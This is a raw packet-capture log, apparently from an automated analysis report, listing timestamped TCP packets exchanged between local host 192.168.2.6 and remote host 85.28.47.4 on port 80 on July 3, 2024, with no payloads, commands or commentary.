                                                                Jul 3, 2024 08:38:17.518517017 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518527985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518529892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518538952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518549919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518558025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518560886 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518572092 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518582106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518584967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518591881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518604040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.518604994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.518634081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599138975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599190950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599199057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599201918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599225044 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599246979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599370956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599381924 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599392891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599402905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599414110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599417925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599452972 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599639893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599651098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599674940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599699020 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599786997 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599798918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599809885 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599821091 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.599833965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599862099 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.599994898 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600007057 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600028992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600054979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600064993 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600076914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600086927 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600097895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600106955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600110054 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600117922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600137949 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600152969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600477934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600492954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600505114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600516081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600517035 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600536108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600562096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600699902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600709915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600722075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600730896 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600739002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600747108 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600758076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600759029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600769043 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600780010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600791931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.600800037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600800037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.600830078 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601398945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601409912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601419926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601429939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601439953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601443052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601449966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601459980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601461887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601473093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601479053 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601484060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601494074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601499081 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601505995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601516008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601520061 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601526976 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601536989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.601538897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.601567984 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.602339029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602350950 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602360964 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602371931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602380991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.602381945 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602392912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602402925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.602404118 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602413893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602421999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.602425098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602436066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602446079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602452040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602457047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602463007 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.602467060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602478027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.602480888 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.602505922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603271961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603282928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603292942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603303909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603311062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603313923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603324890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603334904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603342056 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603346109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603362083 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603369951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603373051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603384018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603389025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603398085 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603409052 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603416920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603420973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603431940 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.603446960 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.603465080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.604191065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604202032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604212046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604222059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604231119 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.604233027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604243040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604253054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604258060 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.604264021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604274035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604278088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.604285002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604295015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.604295015 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604305983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604315996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604326963 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.604326963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.604806900 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605161905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605174065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605185032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605195999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605201006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605206966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605217934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605227947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605232000 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605237961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605247974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605258942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605262041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605269909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605278015 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605281115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605290890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605302095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605307102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605312109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605335951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605351925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605760098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605771065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605781078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605792046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.605794907 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605813980 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.605839014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686053038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686083078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686091900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686158895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686170101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686180115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686268091 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686301947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686312914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686314106 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686374903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686520100 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686531067 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686547995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686557055 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686558008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686569929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686578989 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686589003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686590910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686625957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686777115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686789036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686806917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686816931 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686822891 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686829090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686840057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.686841965 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.686871052 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687125921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687138081 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687149048 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687165976 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687192917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687331915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687347889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687359095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687362909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687370062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687381029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687390089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687391043 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687401056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687412977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687421083 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687439919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687798023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687809944 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687819958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687829971 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687840939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687841892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687851906 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687860966 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687861919 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687872887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687882900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687884092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687894106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687901974 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687905073 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687916040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687917948 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687927961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.687948942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.687975883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688498020 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688509941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688519955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688530922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688540936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688551903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688554049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688561916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688571930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688584089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688584089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688594103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688605070 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688610077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688616037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688626051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688627005 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688637018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688647985 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688656092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688658953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.688683033 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.688699961 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689455032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689466953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689476013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689486027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689496040 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689507008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689513922 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689517021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689527035 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689538002 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689547062 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689548016 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689558029 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689568996 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689579010 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689589024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689589024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689589024 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689599991 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689606905 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689610958 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689620972 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689625025 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689631939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689640999 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.689641953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.689668894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690311909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690324068 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690332890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690345049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690354109 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690365076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690367937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690378904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690383911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690388918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690404892 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690419912 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690448046 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690459013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690469027 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690476894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690479994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690490961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690495014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690501928 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690511942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690521955 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690522909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690534115 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690538883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690545082 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.690555096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.690582991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.691380978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691392899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691402912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691412926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691422939 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691432953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691442013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:17.691443920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691454887 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691464901 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:17.691467047 CEST4971080192.168.2.685.28.47.4
